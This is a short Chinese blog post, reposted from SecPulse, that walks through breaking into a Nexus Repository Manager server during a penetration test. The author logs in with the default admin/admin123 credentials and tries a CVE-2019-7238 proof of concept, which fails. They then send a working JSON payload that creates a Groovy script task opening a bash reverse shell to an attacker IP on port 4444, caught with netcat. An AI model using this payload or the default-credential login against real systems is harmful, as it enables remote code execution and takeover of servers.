1. 威客安全首页
  2. 安全资讯

一次偶遇Nexus

上个月在做测试的时候扫描资产偶遇Nexus这个私服

登录默认账号密码为admin/admin123,反正我是进了。

直接搜寻poc,下载CVE-2019-7238命令执行按照它打打

一次偶遇Nexus

一次偶遇Nexus

一次偶遇Nexus


执行完第一步之后返回true,但是第二步返回500

发现原来是版本并不管用

一次偶遇Nexus

一次偶遇Nexus

尝试使用ReverseShell来进行拿shell

 

填上然后抓包修改

发送Poc

{"action":"coreui_Task","method":"create","data":[{"id":"","typeId":"script","enabled":true,"name":"ReverseShell","alertEmail":"","schedule":"manual","properties":{"language":"groovy","source":"['/bin/bash','-c','/bin/bash-i>& /dev/tcp/IP_ADDRESS/4444 0>&1'].execute()"},"recurringDays":[],"startDate":null}],"type":"rpc","tid":22}

 

 填上ip和监听端口:/IP_ADDRESS/4444

一次偶遇Nexus

成功发生包后任务会出现ReverseShell

一次偶遇Nexus

一次偶遇Nexus

虚拟机监听nc -lvp 4444   直接run

 

等待反弹

一次偶遇Nexus

原文链接:https://www.secpulse.com/archives/111818.html

本站声明:网站内容来源于安全脉搏如有侵权,请联系我们,我们将及时处理。

本文转为转载文章,本文观点不代表威客安全立场。

联系我们

15110186328

在线咨询:点击这里给我发消息

邮件:zhanglei@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code
X